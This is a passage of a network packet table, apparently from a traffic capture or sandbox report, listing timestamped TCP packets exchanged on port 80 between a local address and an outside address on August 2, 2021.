| Aug 2, 2021 10:59:58.901375055 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901376009 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901402950 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901428938 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901432991 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901456118 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901482105 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901485920 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901506901 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901531935 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901536942 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901559114 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901588917 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901590109 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901619911 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901647091 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901652098 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901673079 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901699066 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901705027 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901725054 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901750088 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901751995 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901776075 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901806116 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901807070 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901835918 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901861906 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901870012 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901887894 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901915073 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901918888 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901940107 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901966095 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.901968956 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.901992083 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902023077 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902033091 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.902051926 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902077913 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902086020 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.902105093 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902131081 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902141094 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.902156115 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902183056 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.902189970 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.903403997 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.927838087 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.927920103 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.927942991 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.927963972 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.927978992 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.927985907 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928006887 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928029060 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928030968 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.928051949 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.928105116 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928128004 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928144932 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.928148031 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928169012 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928189993 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928214073 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928236008 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.928240061 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.928258896 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.928272009 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931773901 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931797981 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931814909 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931830883 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931847095 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931860924 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931864977 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931879997 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931881905 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931898117 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931899071 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931914091 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931931973 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931934118 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931952000 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931968927 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.931977987 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.931997061 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932013988 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932018995 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932032108 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932046890 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932055950 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932065010 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932080030 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932096958 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932106018 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932113886 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932132959 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932136059 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932151079 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932157993 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932167053 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932183981 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932192087 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932200909 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932215929 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932224035 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932233095 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932248116 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.932259083 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.932306051 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936465025 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936489105 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936506033 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936522007 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936530113 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936538935 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936554909 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936558008 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936570883 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936589003 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936625004 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936641932 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936661005 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936661005 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936677933 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936692953 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936695099 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936709881 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936726093 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936727047 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936742067 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936758041 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936758995 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936774015 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936791897 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936794043 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936811924 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936826944 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936829090 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936842918 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936858892 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936860085 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936876059 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936892033 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936892986 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936908007 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936925888 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936928034 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936947107 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936959982 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.936964989 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936980963 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936996937 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.936996937 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937011957 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937027931 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937030077 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937045097 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937062025 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937062979 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937081099 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937097073 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937099934 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937114000 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937130928 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937131882 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937146902 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937163115 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937164068 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937177896 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937196016 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937196970 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937215090 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937231064 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937241077 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937247992 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937263966 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937272072 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937280893 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937297106 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937313080 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937319040 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937331915 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937333107 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937356949 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937374115 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937381029 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937391043 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937407017 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937408924 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937422991 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937443972 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937446117 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937463999 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937479973 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937484980 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937496901 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937514067 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937521935 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937530041 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937546968 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937551022 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937562943 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937582970 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937583923 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937599897 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937617064 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937624931 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937637091 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937654018 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937669992 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937676907 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937685966 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937695026 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937704086 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937719107 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937731028 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937736034 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937752008 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937761068 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937772989 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937789917 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937797070 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937807083 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937823057 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937828064 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937839985 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937855005 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937865019 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937874079 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937890053 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937899113 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937910080 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937927008 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937935114 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937943935 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937961102 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937968016 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.937978029 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.937994003 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938010931 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938015938 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938026905 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938035965 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938046932 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938065052 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938072920 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938081980 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938097954 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938107967 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938116074 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938132048 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938139915 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938148975 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938165903 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938165903 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938179016 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938195944 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938210964 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938219070 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938227892 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938237906 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938245058 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938263893 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938266993 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938282013 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938292027 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938296080 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938298941 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
| Aug 2, 2021 10:59:58.938308001 CEST | 49167 | 80 | 192.168.2.22 | 203.159.80.186 |
| Aug 2, 2021 10:59:58.938317060 CEST | 80 | 49167 | 203.159.80.186 | 192.168.2.22 |
